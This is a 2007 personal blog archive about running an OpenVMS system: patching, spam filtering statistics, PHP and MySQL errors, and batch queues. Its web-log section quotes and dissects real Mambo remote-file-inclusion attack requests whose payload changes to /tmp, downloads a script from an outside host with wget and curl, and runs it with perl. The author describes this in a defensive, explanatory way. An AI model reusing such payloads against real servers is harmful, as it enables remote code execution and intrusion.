Month: September 2007

PatchTime
Last weekend I downloaded the latest patches for VMS directly from Diana, but for some reason, the files were corrupted and couldn’t be handled properly. Tonight I got them all via Aphrodite. In preparation of installing them, I made an image backup of the system disk. Of course, some files were locked for write so the latest updates will be missing – but these are all log files and these are not of interest on restore.
The most basic ones have been installed – within half an hour, including 2 reboots. The only problem is that the T4$BATCH queue doesn’t start. The current collection has been stopped on first reboot…. Well, not much lost there.
There are some more patches: DecWindows, the TCPIP stack and the printer control system (DPCS) have ECO’s and I downloaded them all – except for the latest DCPS because that one seems to be missing on the HP site.
I also will install the latest versions of development tools and languages so I’m up-to-date then. MySQL 5.1 is another possibility, I don’t know whether I have to retrieve a newer kit. For Python and related stuff, I’ll need one anyway. RdB? I have the kit, but the PHP module is missing; I might be able to use the Oracle extension when SQLServer is installed as well (which will be the case).
I may run out of memory so Diana will need some tuning. It’s needed anyway, even without these installations 🙂 Or I should get myself a new box – with more memory. There are other machines, these could be enabled – with a local system disk and limited functionality. We’ll see.
Another thing to watch is WordPress 2.3, just out. I’ll wait some time, it requires database updates and that is something to be checked before. Perhaps on the new MySQL version may require a rebuild of the extension, as done before. Or Jean-Francois must have one at hand.
Anyway, Diana seems to be happy – it appears faster than before the patches.
Suse troubles
Iona – running Suse10.2 – refuses to play audio CD. Without notice. Helix pops up when an audio CD is inserted, and disappears as soon as the CD is to be started. Even manual access causes the program to hide away -0 somewhere. The music can be imported, so I can play the CD but only after it has been copied to the harddisk. That is not what I expected.
Firefox has some bits hanging when stopped and the machine needs a reboot – logout alone is not enough. Even login as a different user doesn’t work.
Another annoying thing is that the box is really slow when importing music, and it looks like processes are swapped out of memory. Firefox didn’t do anything, at some time. So I stopped it – using the Gnome monitor (which consumes a huge deal of CPU as well: I found over 33%! )
Would 512Mb internal memopry really be too small for Suse to run?

Anti-spam results
It looks great – but that was to be expected.
Since I can do reports (loading the previous files didn’t succeeed yet) it shows, for this month:

149 messages filtered, of which 63 were delivered (one slipped the filter because it doesn’t have the appropiate rule), meaning 86 were filtered, 252 blacklisted and 2 relay-attempts (of which one is the ISP test). Up to this moment (20:45 system time). The latter two by examining the logfiles only, these are not yet incorporated in the reports.

So of 338 messages, just 63 are acceptable. That is less than 20%!

The one that slipped: it consists of almost nothing but interpuncted words. I guess it’s of those things that are hard to see for the system. One note to send to Process, incluidng a few requests on reporting…

Web content
is getting on. Today I added last weekend’s walks that finished the Krijtlandpad in the south of the Netherlands, this year’s holiday to Scotland and two trips we did in the past.
Also, the back link into the blog has been updated in all image index pages, so hitting the up arrow will return to the correct post. This may need an alternate naming method, I’ll have to dig into that.

Software trouble
The PHP engine gets more and more trouble on the template – it rains errors like:

%HTTPD-W-NOTICED, 23-SEP-2007 20:58:52, CGI:1969, not a strict CGI response
-NOTICED-I-SERVICE, http://www.grootersnet.nl:80
-NOTICED-I-CLIENT, 192.168.0.33
-NOTICED-I-URI, GET (29 bytes) /tracks/wp-admin/link-add.php
-NOTICED-I-SCRIPT, /tracks/wp-admin/link-add.php tracks:[wp-admin]link-add.php (cgi_exe:phpwasd.exe) TRACKS:[wp-admin]link-add.php
-NOTICED-I-CGI, (sessionId)(62 bytes) %DEBUGBOOT-W-CHN, assign channel system service request failed
-NOTICED-I-RXTX, err:0/0 raw:934/0 net:934/0

I don’t get the “%DEBUGBOOT-W-CHN, assign channel system service request failed” message. I cannot locate the value anywhere. It must be caused by the heavier load this template puts on the system, it seems – anywhere . Not just in the admin pages, also on the ‘normal’ pages. I already stripped a lot of addiotional processing, perhaps that helps.

Also, MySQL crashed for some reaon this evening. Similar crash like the last one.

It’s about time to create the native blog program…

Reports work!
Thanks to Process.com the reports can now be created: I had to remove the database files and rerun the report generator. That did the trick. Next is to add the older logs into the database – there is no simple solution at the moment that either add all files into one big PMAS.LOG file, ar rename each historical file to PMAS.LOG and process it.
Something to deal with later on.
The messages that have been blocked because the domain is blacklisted cannot yet be added. But who knows. A future release may offer these facilities.

In future, I may publish some data. Probably monthly statistics.

Anti-spam results
One full week of activity:

* Passed: 123 messages (either because the content was Ok, or the sender has explicitly been allowed (so no check is done))
* Quarantained: 110 messages, 8 false positives (of which a few are normally considered SPAM but I opted in)
* Discarded : 52, 4 false positives
* Blocked on RBL : 581 (in total, I did not filter off same IP addresses – that wouldn’t have happened using the previous method)
* Relay attemps : 17 (apart from the two I did myself)

All in all it means that about 750 messages didn’t make it to VMS mail. That is, on avarage, 100 a day. 2/3 of them because the domain is blacklisted

SMTP did discard a few messages by the configuration, mainly based on domain (gmail and hotmail for instance) but I removed these restrictions because the spam filter seems to be working pretty well.

This sopam filtering has some side effects. None of them really serious.

Since these mesages do no longer are passed to the VMS SMTP client, they no longer show up in OPERATOR.LOG. As a result, the spam report that is updated daily won’t contain any new entries. That is reflected in this report: The anti-spam filter was put in place on 08-sep-2007, in the evebing (when I installed the license and did some minimal configuration):

8-SEP-2007 18:56:55.54 CLNTINRBL 216.130.65.7
9-SEP-2007 00:15:04.78 UNRSLVMF cutie@mailroad.org
9-SEP-2007 10:08:24.36 UNRSLVMF kritzingerzndw@vnux.com
9-SEP-2007 11:25:32.34 BADMF fdophdi@gmail.com
9-SEP-2007 18:18:18.62 UNRSLVMF Schwabuuys@163data.com.cn
11-SEP-2007 02:33:18.76 UNRSLVMF Paulus_eobio@163data.com.cn
12-SEP-2007 15:20:45.53 BADMF sarah9dale@hotmail.com
13-SEP-2007 20:37:52.66 NOSPAMRLY 127.0.0.1 as suspected SPAM ramon@vennik.com
15-SEP-2007 18:54:53.86 UNRSLVMF sac10125@teensadolescentes.com
16-SEP-2007 20:46:22.79 UNRSLVMF kees@mirabilis.com

The last of the “old” config is the one on 8-sep-2007 18:56 – and PMAS came into effect at about 20:00.

On 13-sep-2007. I lifted the restictions in the VMS SMTP server:

$ dir/dat tcpip$smtp_common:smtp.config

Directory SYS$SPECIFIC:[TCPIP$SMTP]

SMTP.CONFIG;58 13-SEP-2007 20:40:03.83
SMTP.CONFIG;57 12-SEP-2007 22:14:14.52
SMTP.CONFIG;56 5-JUL-2007 21:44:35.69

Total of 3 files.

so the one on that day is actually correct: The configuration file was changed after that message was received. Because SMTP had to be stopped and started, it’s even lated than the file date.

Why the last two slipped through the filter, I don’t know. Neither of them can be found in the PMAS logging, so they have not passed the normal route. They haven’t come from the webserver either – there is no hit in any of the logs for these timestamps.

The good news is that Operator.log is no longer poisened with these messages, causing a drastic decrease in size. It’s now about ahlf the size it ued to be.

The third side-effect will be that phishing attempts – like the ones I got from E[B/D]ay, Paypal and banks – won’t make it either. If they get into quarantaine or are discarded, I could still pick them up. But quite likely, their spamicity is so high (> 500) that they will be rejected anyway.

Side effects of changing web structure
Changes in the web structure should be taken into account in scanning the weblogs – and that is something I forgot. So the report on rejected calls contain a big lot of actually valid accesses. Because the scan will access all present files, and create a full new report, I could update the script and rerun it to create new logs. And found a few lines seem to be far too long to process:

19:08:48.60 > Read 1000, Written 3
%DCL-W-TKNOVF, command element is too long - shorten
\212.72.162.197 - - [28/Aug/2007:08:56:18 +0100] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_c
ontent&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://ryanstaronline.com/cmd.txt?&cmd=cd%20/tmp;wget%20ryanstar
%DCL-W-TKNOVF, command element is too long - shorten
\212.72.162.197 - - [28/Aug/2007:08:56:19 +0100] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://ryanstaronline.com/cmd.txt?&cmd=cd%20/tmp;wget%20ryanstaro
%DCL-W-TKNOVF, command element is too long - shorten
\212.72.162.197 - - [28/Aug/2007:08:56:20 +0100] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://ryanstaronline.com/cmd.txt?&cmd=cd%20/tmp;wget%20ryanstaronline.com/https%20;perl%20https%20;c
19:08:53.18 > Read 2000, Written 16

Little problem to be solved ;), it seems the longest records don’t fit:

Record format: Stream_LF, maximum 0 bytes, longest 731 bytes
Record attributes: Carriage return carriage control

That would not be a problem, would it?

I tried assignuing a value to a symbol and that’s not a problem – I can add up to about 4000 bytes. So there is a difference in maximum size between directly assigning value, and when reading from a file.

It’s rather seldom, so don’t bother too much….

What has been the attempt: the GET refers a different file for each:

GET /index2.php?
option=com_content&
do_pdf=1&
id=1index2.php?
....
GET /index.php?
option=com_content&
do_pdf=1&
id=1index2.php?
....
GET /mambo/index2.php?
....

but the code is the same in all three (it’s all on one line, for clearity, I split it up):


_REQUEST[option]=com_content&
_REQUEST[Itemid]=1&
GLOBALS=&
mosConfig_absolute_path=http://ryanstaronline.com/cmd.txt?&
cmd=cd%20/tmp;
wget%20ryanstaronline.com/https%20;
perl%20https%20;
curl%20-o%20http://ryanstaronline.com/https%20;
perl%20https;
%20;
echo%20YYY;
echo

w00tw00t*
A file often tried to be pushed or accessed is named “w00tw00t.at.isc.sans.<something>”. It doesn’t exist, of course. At least: it didn’t: I created one, for fun, to scare the kiddies off, to start with. Off course it doesn’t do any harm to them, for the time being: I may add some code to get as much data as possible and store it for reference and, in particular cases, publish it to the authorities. Not that it would help much, but they ask for it.
(Am I allowed to do so? Probably not, but I don’t care. I have enough indication that a file with this signature is often used to indicate an attempt to compromise the webserver. I don’t accept this and consider all rights to privacy of the individual void and of no value)

T4 batch stopped
T4 wasn’t started in the reboot, since the batch that holds these jobs (T4$BATCH) wasn’t started after reboot. The job was there – two entries of T4$COLLECT, actually – but the queue was stopped and therefore, both jobs were held.

So that is one thing to be changed: it has been the only issue that didn’t work on booting. It could be that it is just the queue that needs a review.

The job has now been rescheduled for next midnight – the right way, using T4$CONFIG.COM.